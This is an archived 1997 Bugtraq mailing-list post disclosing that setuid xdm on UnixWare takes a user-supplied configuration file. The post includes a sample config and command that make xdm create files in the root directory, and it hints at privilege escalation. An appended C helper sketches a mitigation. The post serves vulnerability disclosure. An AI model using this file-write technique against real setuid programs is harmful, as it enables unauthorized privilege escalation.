Bugtraq mailing list archives

XDM bug
From: angelo () tawny ssd hcsc com (Angel Ortiz)
Date: Thu, 2 Jan 1997 17:25:18 -0500


BUGTRAQRS:

**************************DISCLAIMER AND WARNING***********************

The following information is provided as information to users in order
to safeguard their systems.  Users using this exploit are totally
responsible for their actions.
**********************************************************************

I hope the following has not been documented in the past.  If it has
been, my humble apologies.

Anyway, here is the problem.

System: UNIX Ware systems with X

Symptom:
/usr/X/bin/xdm is setuid

Exploit:
If you do a man on xdm you will see that there is a command line
option for a configuration file (-config).

xdm [-config config_file] [-nodaemon] [-debug debug_level]
                   [-error error_log_file]       [-resources resource_file]
                   [-server server_entry]

By default, xdm uses the /usr/lib/xdm/xdm-config file.  Out of
curiosity, if you copy this file to your home directory you will be
able to modify it and change where certain files are written to.

For example, here is a sample xdm-config file which can reside in your
home directory.

----------------------- Cut Here ------------------------------
#ident  "@(#)xdm:config/xdm-conf.cpp    1.12.1.9"
DisplayManager.companyLogoPixmap:   /usr/X/lib/pixmaps/Nlogo.xpm
DisplayManager.backgroundPixmap: /usr/X/lib/pixmaps/Npaper.xpm
DisplayManager.showMnemonic:    1
DisplayManager.errorLogFile:    /DANGEROUS-FILE
DisplayManager.pidFile:     /ALSO-DANGEROUS-FILE
DisplayManager.keyFile:     /usr/X/lib/xdm/xdm-keys
DisplayManager.servers:     /usr/X/lib/xdm/Xservers
DisplayManager._0.authorize:    true
DisplayManager*authComplain:    false
DisplayManager._0.setup:        /usr/X/lib/xdm/Xsetup_0
DisplayManager._0.terminateServer:  true

--------------------- Cut Here -------------------------------

Now, if you execute the following commands from a UNIX prompt:

xdm -config dangerous-xdm-config-file

You will create two files in the / directory.

Guess what they are.  Guess what can be done with such capabilities.

Anyway, please verify xdm setuid on your systems and please let the
bugtraq news group know if it exists on other systems.

Regards,
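
Added example, not part of the original post and not xdm's code: the problem reported above is a setuid program writing to paths (errorLogFile, pidFile) taken from a configuration file the invoking user controls. One common mitigation for that class of bug is to open such paths with the invoking user's identity and to refuse symlinks; the helper name open_as_invoker is hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <sys/types.h>
#include <unistd.h>

/*
 * open_as_invoker() is a hypothetical helper, not an xdm function.
 * It opens a log or pid file whose name came from user-supplied
 * configuration using the invoking user's identity, so a setuid
 * program cannot be steered into writing where that user could not.
 * Returns a file descriptor, or -1 with errno set.
 */
int open_as_invoker(const char *path)
{
    uid_t priv_uid = geteuid();   /* the setuid owner, e.g. root */
    gid_t priv_gid = getegid();
    int fd, err;

    /* Drop the group first: once euid is unprivileged, setegid() may fail. */
    if (setegid(getgid()) != 0)
        return -1;
    if (seteuid(getuid()) != 0) {
        err = errno;
        if (setegid(priv_gid) != 0)
            return -1;
        errno = err;
        return -1;
    }

    /* O_NOFOLLOW refuses a symlink as the final path component;
     * mode 0600 keeps a newly created file private to its owner. */
    fd = open(path, O_WRONLY | O_CREAT | O_APPEND | O_NOFOLLOW, 0600);
    err = errno;

    /* Regain the saved IDs (user first, so the group change is permitted). */
    if (seteuid(priv_uid) != 0 || setegid(priv_gid) != 0) {
        if (fd >= 0)
            close(fd);
        return -1;   /* refuse to continue in a half-switched state */
    }
    errno = err;
    return fd;
}
```

When the program is not setuid, the ID switches are no-ops and the function behaves like a plain open() that rejects symlinks.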


